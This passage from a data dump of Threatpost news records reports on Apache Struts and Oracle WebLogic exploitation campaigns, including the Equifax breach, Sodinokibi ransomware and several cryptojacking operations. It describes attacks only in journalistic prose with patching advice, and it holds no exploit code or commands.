U.S. Senate Finance Committee, including Sen. Orrin Hatch (R-UT) and Ron Wyden (D-Ore.) sent another letter to Equifax CEO Richard Smith asking for additional information about the breach.\n\n\u201cThe scope and scale of this breach appears to make it one of the largest on record, and the sensitivity of the information compromised may make it the most costly to taxpayers and consumers,\u201d the senators wrote in a [letter](<https://www.finance.senate.gov/download/91117-equifax-release>) on Monday.\n\nWhile the FTC doesn\u2019t typically comment on ongoing investigations the Commission did confirm Thursday afternoon because of the \u201cintense public interest\u201d and \u201cpotential impact of this matter,\u201d it was looking into the breach.\n\nEquifax said Americans and an undisclosed number of Canadian and United Kingdom residents were affected by the breach but security news site [KrebsonSecurity.com](<https://krebsonsecurity.com/2017/09/ayuda-help-equifax-has-my-data/>) said this week Argentinans may be implicated as well. Brian Krebs, who authors the site, claims he was contacted by Alex Holden, who runs the firm Hold Security, earlier this week. Two of Holden\u2019s employees, native Argentinans, discovered an Equifax portal for employees in Argentina that included their names, email addresses, and DNI \u2013 the Argentinian equivalent of a Social Security Number.\n\nThe site, according to Holden \u201cwas wide open, protected by perhaps the most easy-to-guess password combination ever: \u201cadmin/admin.\u201d Krebs claims the portal was disabled upon notifying Equifax\u2019s attorney and that the company is looking into how it may have been left unsecured.\n", "cvss3": {}, "published": "2017-09-14T16:00:34", "type": "threatpost", "title": "Equifax Confirms March Struts Vulnerability Behind Breach", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-09-15T13:01:13", "id": "THREATPOST:9E84C27A33C751DE6ECC9BAAF9C0F19B", "href": "https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-04-08T11:51:51", "description": "A recently-disclosed critical vulnerability in Oracle WebLogic is being actively exploited in a slew of attacks, which are distributing a never-before-seen ransomware variant.\n\nThe recently-patched flaw exists in Oracle\u2019s WebLogic server, used for building and deploying enterprise applications. The deserialization vulnerability ([CVE-2019-2725](<https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html>)\u200b) is being exploited to spread what researchers with Cisco Talos in a [Tuesday analysis](<https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html>) dubbed the \u201cSodinokibi\u201d ransomware.\n\n\u201cThis is the first time we have seen this ransomware being used in the wild,\u201d Jaeson Schultz, technical leader, at Cisco Talos, told Threatpost. \u201cThis new ransomware first emerged on April 26. Part of what makes this ransomware stick out is the fact that attackers were using a 0-day vulnerability to install it. Talos is continuing to analyze the ransomware itself. It\u2019s obfuscated and there are several anti-analysis tricks.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe critical flaw, which has a CVSS score of 9.8, is a remote code execution bug that is remotely exploitable without authentication. Impacted are versions 10.3.6.0.0 and 12.1.3.0.0 of the product. The flaw was patched on April 26 \u2013 but researchers said that attackers have been exploiting the flaw since April 21.\n\n\u201cDue to the severity of this vulnerability, Oracle recommends that this Security Alert be applied as soon as possible,\u201d Eric Maurice, director of security assurance at Oracle, said in a [recent post](<https://blogs.oracle.com/security/security-alert-cve-2019-2725-released>) about the vulnerability.[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/04/30140000/oracle-weblogic-flaw.png>)\n\nThe ransomware first came onto researchers\u2019 radar on April 25 (the day before a patch was released), after attackers attempted to make an HTTP connection with a vulnerable Oracle WebLogic server.\n\nWhile Cisco Talos researchers would not disclose further details to Threatpost regarding the victim of this particular ransomware attack \u2013 such as the company size or industry \u2013 they said they do think multiple victims are being targeted.\n\n\u201cAttackers were ultimately successful at encrypting a number of customer systems during this incident,\u201d they said.\n\nWhile typically ransomware variants require some form of user interaction \u2013 such as opening an attachment to an email message or clicking on a malicious link, this incident was abnormal as attackers simply leveraged the Oracle WebLogic vulnerability, researchers said.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/04/30135836/ransomware-note.png>)\n\nRansomware Note\n\nOnce attackers found a vulnerable server, they sent an HTTP POST request to that server. The request contained a PowerShell command, which downloaded a file called \u201cradm.exe.\u201d That then saved the ransomware locally and executed it.\n\nOnce downloaded, the ransomware encrypted the victim\u2019s systems and displayed a ransom note to them, directing victims to a page on the Tor network to a domain (decryptor[.]top) the public web, which was registered on March 31 this year.\n\nAfter victims visited said pages, they were directed to create a Bitcoin wallet and purchase $2500 (USD) worth of Bitcoin. They then were directed to transfer the Bitcoin to an address provided by the attackers. After the transaction is confirmed on the Blockchain, the attackers updates the page with a link to download the decryptor, researchers told Threatpost.\n\nResearchers also noted that, once downloaded, the malicious file executed \u200bvssadmin.exe, a legitimate utility bundled with Windows that enables allows administrators to manage the shadow copies that are on the computer. Shadow copies are a technology that enables systems to take automatic backup copies of computer files.\n\nBecause attackers executed this feature, it allows them to access and delete the automatic backups \u2013 making it harder for victims to recover their data: \u201cThis action\u200b is a common [tactic] of ransomware to prevent users from easily recovering their data,\u201d researchers said. \u201cIt attempts to delete default Windows backup mechanisms, otherwise known as \u2018shadow copies,\u2019 to prevent recovery of the original files from these backups.\u201d\n\nWhile researchers told Threatpost they\u2019re not sure who is behind the attack, they did note that after the ransomware deployment, attackers followed up with an additional exploit attempt (of the CVE-2019-2725 vulnerability) approximately eight hours later.\n\nInterestingly, this attack utilized the infamous [Gandcrab ransomware](<https://threatpost.com/tag/gandcrab-ransomware/>) (v5.2), making researchers believe that the attacker is a Gandcrab ransomware affiliate member, Schultz told Threatpost.\n\n\u201cWe find it strange the attackers would choose to distribute additional, different ransomware on the same target,\u201d researchers said. \u201cSodinokibi being a new flavor of ransomware, perhaps the attackers felt their earlier attempts had been unsuccessful and were still looking to cash in by distributing Gandcrab.\u201d\n\nLooking forward, researchers said that they expect attacks on Oracle\u2019s WebLogic servers to increase, and urge users to update immediately. This flaw was not part of Oracle\u2019s regularly-scheduled quarterly patch earlier in [April](<https://threatpost.com/oracle-squashes-53-critical-bugs-in-april-security-update/143845/>), where it fixed 53 other critical vulnerabilities in Oracle products.\n\n\u201cDue to the ubiquity of Oracle WebLogic servers and the ease of exploitation of this vulnerability, Talos expects widespread attacks involving CVE-2019-2725,\u201d they said.\n", "cvss3": {}, "published": "2019-04-30T19:20:13", "type": "threatpost", "title": "New 'Sodinokibi' Ransomware Exploits Critical Oracle WebLogic Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-2725", "CVE-2020-0688"], "modified": "2019-04-30T19:20:13", "id": "THREATPOST:4DD624E32718A8990263A37199EEBD02", "href": "https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-01-28T21:55:45", "description": "Researchers have identified an updated malware variant used by the cybercrime gang Rocke Group that targets cloud infrastructures with crypto-jacking attacks.\n\nThe malware is called Pro-Ocean, which was first discovered in 2019, and has now been beefed-up with \u201cworm\u201d capabilities and rootkit detection-evasion features.\n\n\u201cThis malware is an example that demonstrates that cloud providers\u2019 agent-based security solutions may not be enough to prevent evasive malware targeted at public cloud infrastructure,\u201d said Aviv Sasson with Palo Alto Networks [on Thursday](<https://unit42.paloaltonetworks.com/pro-ocean-rocke-groups-new-cryptojacking-malware/>). \u201cAs we saw, this sample has the capability to delete some cloud providers\u2019 agents and evade their detection.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nSince [its discovery in 2018](<https://threatpost.com/new-threat-actor-rocke-a-rising-monero-cryptomining-menace/137090/>), the Rocke Group has widened its [targeting of cloud applications](<https://threatpost.com/cryptomining-malware-uninstalls-cloud-security-products/140959/>) \u2013 including Apache ActiveMQ, Oracle WebLogic and open-source data structure store Redis \u2013 for mining Monero. Researchers say that since these attacks initially broke out, many cybersecurity companies have kept Pro-Ocean on their radar. Rocke Group\u2019s latest update aims to sidestep these detection and mitigation efforts.\n\n## **Pro-Ocean Malware**\n\nPro-Ocean uses a variety of known vulnerabilities to target cloud applications. These include a [critical flaw in Apache ActiveMQ](<https://nvd.nist.gov/vuln/detail/CVE-2016-3088>) (CVE-2016-3088) and [a high-severity vulnerability](<https://nvd.nist.gov/vuln/detail/CVE-2017-10271>) in Oracle WebLogic (CVE-2017-10271). The malware has also been spotted targeting unsecure instances of Redis.\n\nOnce downloaded, the malware attempts to remove other malware and cryptominers, including [Luoxk](<https://blog.netlab.360.com/malicious-campaign-luoxk-is-actively-exploiting-cve-2018-2893/>), [BillGates](<https://www.akamai.com/us/en/multimedia/documents/state-of-the-internet/bill-gates-botnet-threat-advisory.pdf>), [XMRig](<https://threatpost.com/new-cryptominer-distributes-xmrig-in-aggressive-attacks/132027/>) and [Hashfish](<https://virus-removal-guide.net/34710-is-the-hashfish-exe-file-legal-how-to-remove-hashfish-exe-trojan-coinminer/>). It then kills any processes using the CPU heavily, so that its XMRig miner can utilize 100 percent of the CPU juice needed to sow Monero.\n\nThe malware is made up of four components: A rootkit module that installs a rootkit and other various malicious services; a mining module that runs the XMRig miner; a Watchdog module that executes two Bash scripts (these check that the malware is running and search any processes using CPU heavily); and an infection module that contains \u201cworm\u201d capabilities.\n\n## **New Features**\n\nThe latter \u201cworm\u201d feature is a new add for Pro-Ocean, which previously only infected victims manually. The malware now uses a Python infection script to retrieve the public IP address of the victim\u2019s machine. It does so by accessing an online service with the address \u201cident.me,\u201d which scopes out IP addresses for various web servers. Then, the script tries to infect all the machines in the same 16-bit subnet (e.g. 10.0.X.X).\n\n\u201cIt does this by blindly executing public exploits one after the other in the hope of finding unpatched software it can exploit,\u201d said Sasson.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/01/28143636/word-image-4.png>)\n\nPro-Ocean\u2019s modular structure. Credit: Palo Alto Networks\n\nOther threat groups have previously adopted worm-like functionality into their Monero-chugging malware. TeamTNT\u2019s cryptomining worm, for instance, [was found spreading through](<https://threatpost.com/aws-cryptojacking-worm-cloud/158427/>) the Amazon Web Services (AWS) cloud and collecting credentials in August.\n\nThe Pro-Ocean malware has also added mew rootkit capabilities that cloak its malicious activity.\n\nThese updated features exist in [Libprocesshider](<https://github.com/gianlucaborello/libprocesshider>), a library for hiding processes used by the malware. This library was utilized by previous versions of Pro-Ocean \u2013 however, in the new version, the developer of the code has added several new code snippets to the library for further functionalities.\n\nFor example, before calling the libc function open (libc is a library of standard functions that can be used by all C programs), a malicious function determines whether the file needs to be hidden to obfuscate malicious activities.\n\n\u201cIf it determines that the file needs to be hidden, the malicious function will return a \u2018No such file or directory\u2019 error, as if the file in question does not exist,\u201d said Sasson.\n\nResearchers said they believe that the Rocke Group will continue to actively update its malware, particularly as the [cloud grows as a lucrative target for attackers](<https://threatpost.com/cloud-attacks-bypass-mfa-feds/163056/>).\n\n\u201cCryptojacking malware targeting the cloud is evolving as attackers understand the potential of that environment to mine for crypto coins. We previously saw simpler attacks by the Rocke Group, but it seems this group presents an ongoing, growing threat. This cloud-targeted malware is not something ordinary since it has worm and rootkit capabilities. We can assume that the growing trend of sophisticated attacks on the cloud will continue.\u201d\n\n**Download our exclusive **[**FREE Threatpost Insider eBook**](<https://threatpost.com/ebooks/healthcare-security-woes-balloon-in-a-covid-era-world/?utm_source=FEATURE&utm_medium=FEATURE&utm_campaign=Nov_eBook>) [_**Healthcare Security Woes Balloon in a Covid-Era World**_](<https://threatpost.com/ebooks/healthcare-security-woes-balloon-in-a-covid-era-world/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_eBook>)** , sponsored by ZeroNorth, to learn more about what these security risks mean for hospitals at the day-to-day level and how healthcare security teams can implement best practices to protect providers and patients. Get the whole story and **[**DOWNLOAD the eBook now**](<https://threatpost.com/ebooks/healthcare-security-woes-balloon-in-a-covid-era-world/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_eBook>)**\u2013 on us!**\n", "cvss3": {}, "published": "2021-01-28T20:06:57", "type": "threatpost", "title": "Rocke Group\u2019s Malware Now Has Worm Capabilities", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2016-3088", "CVE-2017-10271", "CVE-2018-2893"], "modified": "2021-01-28T20:06:57", "id": "THREATPOST:D3FA06D667A0B326C1598C8BCD106E7D", "href": "https://threatpost.com/rocke-groups-malware-now-has-worm-capabilities/163463/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-17T21:39:31", "description": "Cryptocurrency-mining malware, called WatchDog, has been running under the radar for more than two years \u2013 in what researchers call one of the largest and longest-lasting Monero cryptojacking attacks to date.\n\n[](<https://threatpost.com/webinars/15-cybersecurity-gaffes-and-fixes-mid-size-businesses-face/?utm_source=ART&utm_medium=ART&utm_campaign=Feb_webinar>)\n\nClick to Register\n\nThe attack is still in operation as of this writing \u2013 and due to the size and scope of the infrastructure, it will be difficult to fully contain, researchers told Threatpost. Thus far, attackers have hijacked at least 476 Windows and Linux devices, in order to abuse their system resources for mining Monero cryptocurrency.\n\nRight now, the attackers behind this campaign are sticking to cryptojacking \u2013 but researchers warn that it is \u201chighly likely\u201d they could find identity and access management (IAM) data on previously-compromised cloud systems, due to the root and administrative access that\u2019s acquired during the malware implantation. This could open the door for future \u2013 and more dangerous \u2013 attacks.\n\n\u201cIt is clear that the WatchDog operators are skilled coders and have enjoyed a relative lack of attention regarding their mining operations,\u201d said researchers with Palo Alto Networks [on Wednesday](<https://unit42.paloaltonetworks.com/watchdog-cryptojacking/>). \u201cWhile there is currently no indication of additional cloud compromising activity at present (i.e. the capturing of cloud platform identity and access management credentials, access ID or keys), there could be potential for further cloud account compromise.\u201d\n\n## **How Much Money Does Cryptomining Malware Make? **\n\nThe attack is a [prime example of cryptojacking](<https://threatpost.com/cryptojacking-attack-found-on-los-angeles-times-website/130041/>), which is when attackers leverage malicious cryptomining for financial profit. They do so by hacking into devices to install software, which then uses the devices\u2019 power and resources to mine for cryptocurrencies or to steal cryptocurrency wallets owned by the victims.\n\nSince it launched on Jan. 27, 2019, the WatchDog mining operation has collected at least 209 Monero cryptocurrency coins (XMR) \u2013 which is currently valued at $32,056. While this figure appears to be relatively low, the important piece of cryptojacking operations is not the immediate market price, but the total XMR mined, Nathaniel Quist, senior cloud threat researcher for Unit 42 at Palo Alto Networks, told Threatpost.\n\nAt the time of writing the research, the market price for Monero was $153. But, just within the last 24 hours, the market price of XMR has soared to $254, Quist explained \u2013 so as of Wednesday, WatchDog has actually collected $53,086.\n\n\u201cIn the past, we have seen dramatic swings in cryptocurrency valuations,\u201d Quist told Threatpost. \u201cDepending upon the market price over the next months, we could see cryptocurrency market prices touch the record highs that were seen back in early 2018, where Monero was valued at $469. If that were the case, WatchDog could increase its value total to $98,021 without mining another coin, making it a very profitable mining operation.\u201d\n\n## **WatchDog Malware: Go Binaries Drive Functionality**\n\nResearchers said, the WatchDog mining malware is composed of a three-part Go Language binary set and a bash or PowerShell script file. Go, an open-source programming language, has previously been utilized by various cybercriminals for various cryptojacking attacks, [including TeamTNT](<https://threatpost.com/blackt-cryptojacker-teamtnt/159853/>) and [the developers of ElectroRAT](<https://threatpost.com/electrorat-drains-cryptocurrency-wallet-funds-of-thousands/162705/>).\n\nWatchDog\u2019s Go binaries each perform a specific functionality \u2013 including one that emulates the Linux watchdog daemon functionality (hence the name of the malware, WatchDog) by ensuring that the mining process does not overload or stop unexpectedly. The watchdog daemon\u2019s functionality is to open the device and provide a necessary refresh to keep the system from resetting. For example, it can test process table space, memory usage and running processes.\n\n\u201cWatchDog\u2019s usage of Go binaries allows it to perform the stated operations across different operating systems using the same binaries\u2026 as long as the Go Language platform is installed on the target system,\u201d said researchers.\n\nThe Go binaries include a network scanner and exploitation binary (networkmanager), a process monitoring binary (phpguard), and a version of the malicious XMRig cryptomining software (phpupdate).\n\n## **The WatchDog Cryptojacking Campaign: Windows and Linux OS Under Attack**\n\nThe initial attack vector stems from the networkmanager binary. When the binary identifies a vulnerable target, it attempts to compromise that identified system using a robust set of built-in application exploits.\n\nSpecifically, networkmanager comes loaded with 33 exploits, 32 individual remote code execution (RCE) functions and several shell grab functions. For instance, it scans for applications such as Elasticsearch servers that are vulnerable to CVE-2015-1427 and CVE-2014-3120 and Oracle WebLogic Servers vulnerable to CVE-2017-10271.\n\nFor context, this is a significant amount of exploits when compared to other miners \u2013 [such as the Smominru cryptocurrency miner](<https://threatpost.com/massive-smominru-cryptocurrency-botnet-rakes-in-millions/129726/>), which operated from 2017 to 2018 and collected nearly 9,000 XMR, said Quist. Unlike Smominru\u2019s two exploits, WatchDog\u2019s numerous exploits and RCE functions \u201cmake it better at compromising exposed systems,\u201d he told Threatpost.\n\n## **WatchDog Compared to Graboid Cryptomining Malware**\n\nOf note, WatchDog is stealthier than other cryptomining malware, such as the wormable [Monero mining malware Graboid](<https://threatpost.com/docker-containers-graboid-crypto-worm/149235/>). Discovered last year, Graboid was the largest known mining operation to date in terms of the total number of active systems.\n\nDuring the time of its operation, Graboid consisted of at least 2,000 exposed and compromised Docker Daemon APIs systems, and researchers said the malware could have also achieved \u201chigher processing speeds\u201d due to the configuration script utilizing all available container central processing units (CPUs).\n\nHowever, Graboid was only known to operate for up to three months before its Docker Hub images were removed. That\u2019s because the malware relied on a third-party (Docker Hub) to host its malicious payload \u2013 whereas WatchDog does not, allowing it to have remained active for more than two years, said researchers.\n\nIn fact, WatchDog has a fairly extensive infrastructure behind its mining operations, with researchers mapping out 18 root IP endpoints and seven malicious domains, which serve at least 125 malicious URL addresses used to download its toolset.\n\n## **Cryptojacking: A Cyberattack on the Rise**\n\nWatchDog comes as the value of cryptocurrency has exploded, making cryptojacking a lucrative type of financial attack for cybercriminals. The XMR market value follows the cryptocurrency prices of Bitcoin \u2013 which as of Wednesday set a record-high topping $51,000.\n\nXMR has subsequently increased in value from $153 on February 9 to $254 on Wednesday \u2013 approaching its highest-recorded value of $469.79 (set in January 2018), Quist told Threatpost.\n\n\u201cCybercriminals are watching the market value of XMR,\u201d Quist told Threatpost. \u201cOver the last six months, Unit 42 researchers have seen a 40 percent increase in network traffic to public mining pools, which indicates that more mining operations are taking place. The trend of more XMR mining operations appears to be following the increasing market value price of XMR.\u201d\n\nThis week, researchers with Kaspersky also found that distributed denial-of-service (DDoS) attacks dropped significantly at the end of 2020, down 31 percent in the fourth quarter, as cybercriminals switch their efforts to cryptomining. [According to the analysis this week](<https://threatpost.com/ddos-attacks-q4-cryptomining-resurgence/163998/>), cybercriminals began repurposing infected devices for cryptomining in response to rising cryptocurrency values.\n\nOne such [recently discovered malware](<https://threatpost.com/new-malware-hijacks-kubernetes-clusters-to-mine-monero/163629/>), dubbed Hildegard, was found being leveraged by the TeamTNT threat group to target Kubernetes clusters with cryptojacking attacks. In January, [researchers also identified an updated malware variant](<https://threatpost.com/rocke-groups-malware-now-has-worm-capabilities/163463/>) used by the cybercrime gang Rocke Group that targets cloud infrastructures with crypto-jacking attacks. And, in January, [researchers dug up new discoveries](<https://threatpost.com/sql-server-malware-tied-to-iranian-software-firm-researchers-allege/163230/>) surrounding a cryptomining operation, called MrbMiner, which was downloading a cryptominer on thousands of internet-facing SQL servers.\n\n### _Is your small- to medium-sized business an easy mark for attackers?_\n\n**Threatpost WEBINAR:** _ Save your spot for __\u201c**15 Cybersecurity Pitfalls and Fixes for SMBs**__,\u201d a _[**_FREE Threatpost webinar_**](<https://threatpost.com/webinars/15-cybersecurity-gaffes-and-fixes-mid-size-businesses-face/?utm_source=ART&utm_medium=ART&utm_campaign=Feb_webinar>)** _on Feb. 24 at 2 p.m. ET._**_ Cybercriminals count on you making these mistakes, but our experts will help you lock down your small- to mid-sized business like it was a Fortune 100. _[_Register NOW_](<https://threatpost.com/webinars/15-cybersecurity-gaffes-and-fixes-mid-size-businesses-face/?utm_source=ART&utm_medium=ART&utm_campaign=Feb_webinar>)_ for this _**_LIVE_****_ _**_webinar on Wed., Feb. 24._\n", "cvss3": {}, "published": "2021-02-17T21:39:10", "type": "threatpost", "title": "Windows, Linux Devices Hijacked In Two-Year Cryptojacking Campaign", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-3120", "CVE-2015-1427", "CVE-2017-10271"], "modified": "2021-02-17T21:39:10", "id": "THREATPOST:555BCC102B10B8C6CABB0054595AC756", "href": "https://threatpost.com/windows-linux-devices-hijacked-in-two-year-cryptojacking-campaign/164048/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-10-30T07:20:19", "description": "The Apache Software Foundation warned in an advisory that the latest version of the Commons FileUpload library is susceptible to a two-year-old remote code execution flaw. Users of the vulnerable library must update their projects manually.\n\nThe critical bug in Commons FileUpload library is a known vulnerability ([CVE-2016-1000031](<http://mail-archives.us.apache.org/mod_mbox/www-announce/201811.mbox/%3CCAMopvkMo8WiP%3DfqVQuZ1Fyx%3D6CGz0Epzfe0gG5XAqP1wdJCoBQ%40mail.gmail.com%3E>)) that enables remote code execution in the open-source framework, which facilitates developing web applications in the Java programming language.\n\nEssentially a Java Object exists in the Apache Commons FileUpload library that can be manipulated so that when it is deserialized, it can write or copy files to disk in arbitrary locations.\n\n\u201cA remote attacker could exploit this vulnerability to take control of an affected system,\u201d according to the Monday [advisory](<http://mail-archives.us.apache.org/mod_mbox/www-announce/201811.mbox/%3CCAMopvkMo8WiP%3DfqVQuZ1Fyx%3D6CGz0Epzfe0gG5XAqP1wdJCoBQ%40mail.gmail.com%3E>). \u201cYour project is affected if it uses the built-in file upload mechanism of Struts 2, which defaults to the use of commons-fileupload. The updated commons-fileupload library is a drop-in replacement for the vulnerable version. Deployed applications can be hardened by replacing the commons-fileupload jar file in WEB-INF/lib with the fixed jar.\u201d\n\nThe vulnerable commons-fileupload library is used in Apache Struts versions 2.3.36 and prior, the Foundation said in a Monday advisory. They urged users to upgrade to the latest released version of Commons FileUpload library \u2013 which is 1.3.3.\n\nThe vulnerability is reminiscent of [CVE-2017-5638](<https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/>), another critical remote code execution Apache vulnerability behind the massive 2017 Equifax breach that led to the compromise of 143 million Americans\u2019 data.\n\nWhile that Apache Struts vulnerability (impacting the Jakarta based file upload Multipart parser) was patched back in March 2017, the consumer credit reporting agency didn\u2019t apply patches for two months after the flaw\u2019s disclosure \u2013 eventually leading to the groundbreaking breach.\n\nSimilarly, this latest deserialization vulnerability was disclosed and patched in commons-fileupload in [March,](<https://issues.apache.org/jira/browse/FILEUPLOAD-279>) but since then a new version of Struts that became available \u2013 the 2.3.36 version, which was released in October \u2013 has touted vulnerable versions of the library.\n\nStruts versions from 2.5.12 are not affected, as this newer version of Struts includes a patched commons-fileupload component.\n\nUsers can fix the risk by replacing the faulty library manually.\n\n\u201cThere is no simple \u2018new Struts version\u2019 to fix this,\u201d said Johannes Ullrich, dean of research at the SANS Institute, in a blog [post](<https://isc.sans.edu/diary/rss/24278>) on Monday. \u201cYou will have to swap out the commons-fileupload library manually.\u201d\n\n\u201cAnd while you are at it: Double check that you don\u2019t have any other copies of the vulnerable library sitting on your systems,\u201d he added. \u201cStruts isn\u2019t the only one using it, and others may have neglected to update it as well.\u201d\n\nIt is only the latest security issue to afflict Apache Struts \u2013 earlier in August for instance, a critical remote code-execution vulnerability in Apache Struts 2 was [disclosed](<https://threatpost.com/apache-struts-2-flaw-uncovered-more-critical-than-equifax-bug/136850/>).\n", "cvss3": {}, "published": "2018-11-06T12:27:15", "type": "threatpost", "title": "Apache Struts Warns Users of Two-Year-Old Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2016-1000031", "CVE-2017-5638", "CVE-2019-11043"], "modified": "2018-11-06T12:27:15", "id": "THREATPOST:A45826A8CDA7058392C4901D6AAD15F1", "href": "https://threatpost.com/apache-struts-warns-users-of-two-year-old-vulnerability/138820/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-03T05:58:59", "description": "It was only a matter of time before attacks were seen in the wild, and now it\u2019s happened. A known threat actor has mounted a large cryptomining campaign using the recently disclosed Apache Struts 2 critical remote code-execution vulnerability. It uses a new malware designed for persistence and stealth, dubbed CroniX.\n\nThe malware\u2019s snappy name comes from the fact that it uses the Cron tool for persistence and Xhide for launching executables with fake process names, according to researchers at F5 Labs, who analyzed the campaign.\n\nThe Apache Struts 2 namespace vulnerability ([CVE-2018-11776](<https://threatpost.com/apache-struts-2-flaw-uncovered-more-critical-than-equifax-bug/136850/>)) was disclosed just two weeks ago by researchers at Semmle. Researchers have warned that it has the potential to open the door to even more critical havoc than the bug at the root of the [infamous Equifax breach](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>), which was also an Apache Struts 2 flaw ([CVE-2017-5638](<https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/>)). That\u2019s quite a statement given that the attack resulted in the exposure of personally identifiable information (PII) of 147 million consumers, costing the Fortune 500 credit-reporting company more than $439 million in damages and leading to the resignation of several of its executives.\n\nThe new campaign makes use of one of the [proof-of-concept exploits](<https://threatpost.com/poc-code-surfaces-to-exploit-apache-struts-2-vulnerability/136921/>) that were published on Github2 and Twitter just days after the latest flaw was publicized. Adversaries are using it to gain unauthenticated remote code-execution capabilities on targeted Linux machines in order to install a [Monero cryptomining script](<https://threatpost.com/?s=monero>), F5 researchers said.\n\n\u201cAs with many other Apache Struts 2 vulnerabilities, CVE-2018-11776 allows attackers to inject Object-Graph Navigation Language (OGNL) expressions, which might contain malicious Java code that is evaluated under several circumstances,\u201d the team explained in [a posting](<https://www.f5.com/labs/articles/threat-intelligence/apache-struts-2-vulnerability--cve-2018-11776--exploited-in-cron>) Tuesday. \u201cThis time, the injection point is within the URL. The attacker sends a single HTTP request while injecting an OGNL expression that, once evaluated, executes shell commands to download and execute a malicious file.\u201d\n\nThey added, \u201cconsidering it\u2019s only been two weeks since this vulnerability was discovered, it\u2019s worth noting how fast attackers are weaponizing vulnerabilities and how quickly researchers are seeing them in the wild.\u201d\n\n**Analysis**\n\nTaking a closer look at the malware, the team saw the malware downloads a file called \u201cH,\u201d which turns out to be an old XHide tool for launching executables with a fake process name, the researchers said. In this case, it launches a fork of the XMRig Monero miner, with an embedded configuration (pool, username and password), while changing the process name to the more innocuous-sounding \u201cjava.\u201d\n\nThe analysts also saw that three Cron jobs are used for persistence, with two of them refreshing the backdoor every day with downloads from the C2 server. Another job downloads a daily file named \u201canacrond,\u201d which saves itself in various Cron job files around the system. In all three cases, the scripts are used to connect to the C2 server and download the deployment bash script to restart the mining process; older versions of the scripts are then deleted off the system.\n\nCroniX also a competitive malware, locating and deleting the binaries of any previously installed cryptominers so as to claim all of the CPU resources for itself, F5 found.\n\n\u201cFor some miners, the attacker decides to take a more careful approach and check each process name and process CPU usage, and then kill only those processes that utilize 60 percent or more of the CPU resources,\u201d F5 researchers said. \u201cThis is probably done to avoid killing legitimate processes as the names of these miners (crond, sshd and syslogs) typically relate to legitimate programs on a Linux system.\u201d\n\nComparing the modus operandi of the operation, F5 researchers believe the actor is the same group that was behind a previous campaign exploiting Jenkins servers via [CVE-2017-1000353](<https://devcentral.f5.com/articles/jenkins-unsafe-deserialization-vulnerability-cve-2017-1000353-30142>). That campaign was uncovered two months ago.\n\n\u201cThe malware deployment pattern\u2026similar deployed file names and the quite unique usage of the XHide process-faker made us believe that the threat actor behind the exploitation of this fresh Struts 2 vulnerability is the same one,\u201d researchers noted in the analysis.\n\nOne difference is that in the previous campaign, the threat actor used a Chinese Git website to host malicious files. Here, the attackers are using a dedicated web server hosted in the U.S., along with domain names designating the Pacific island of Palau (.pw) \u2013 believed registered by a Russian registrant.\n\nWhile cryptomining can be seen as less destructive than [wiper malware,](<https://threatpost.com/secrets-of-the-wiper-inside-the-worlds-most-destructive-malware/131836/>) [ransomware](<https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/>) or Equifax-like [mass data exfiltration](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) (all of which can be carried out using this flaw), Jeannie Warner, security manager at WhiteHat Security, noted that exploit development tends to be faster for more widely embedded flaws, highlighting the importance of patching this particular issue immediately.\n\n\u201cApache Struts is used by some of the world\u2019s largest companies,\u201d she said via email. \u201cThe more common the vulnerability, the more it helps attackers simplify their process\u2026and the easier it becomes for non-skilled hackers to compromise more websites. Methods to exploit this newest Struts vulnerability are already available online, so it is absolutely critical that all companies implement the patch immediately. There\u2019s no time to waste.\u201d\n\nMore attacks should be anticipated; in fact, while Linux machines seem to be the target for this particular CroniX effort, the F5 analysis uncovered an additional file lurking on the server that seems tailored to Microsoft\u2019s OS.\n\n\u201c[The file] at /win/checking-test.hta holds a Visual Basic script that calls a Microsoft Windows cmd to run a Powershell command on a targeted victim,\u201d researchers said. \u201cSo, it seems this threat actor is targeting Windows OS (not just Linux) using another operation hosted on the same server.\u201d\n", "cvss3": {}, "published": "2018-09-05T17:48:03", "type": "threatpost", "title": "Active Campaign Exploits Critical Apache Struts 2 Flaw in the Wild", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-1000353", "CVE-2017-5638", "CVE-2018-11776"], "modified": "2018-09-05T17:48:03", "id": "THREATPOST:D70CED5C745CA3779F2D02FBB6DBA717", "href": "https://threatpost.com/active-campaign-exploits-critical-apache-struts-2-flaw-in-the-wild/137207/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:25:45", "description": "Oracle is urging customers to fast-track a patch for a critical flaw in its WebLogic Server under active attack. The company said it has received numerous 